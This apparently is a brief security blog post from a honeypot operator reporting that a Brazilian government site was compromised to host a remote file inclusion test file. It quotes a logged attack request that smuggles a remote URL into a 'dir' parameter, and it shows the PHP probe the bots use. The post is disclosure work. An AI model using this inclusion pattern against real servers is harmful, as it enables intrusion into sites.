Today our honeypot detected one more .gov site hacked (among the thousands we see daily). This time from the Brazilian government. The site in question is http://www.sefaz.mt.gov.br.
We started to see RFI requests trying to use a file placed inside their “portal” directory:
a.185.231.103 - - -
"GET /bbs//write.php?dir=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 36 "-" "Mozilla/5.0"
After examining it we can see again traces of the famous RFI bot scanner:
$ lynx --source --dump http://www.sefaz.mt.gov.br/portal/tes.txt
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Anyone with contacts on the mt.gov.br? Let them know about it.. We only detected this file, but if the attackers were able to add this one, they probably added (or will add) a bunch more.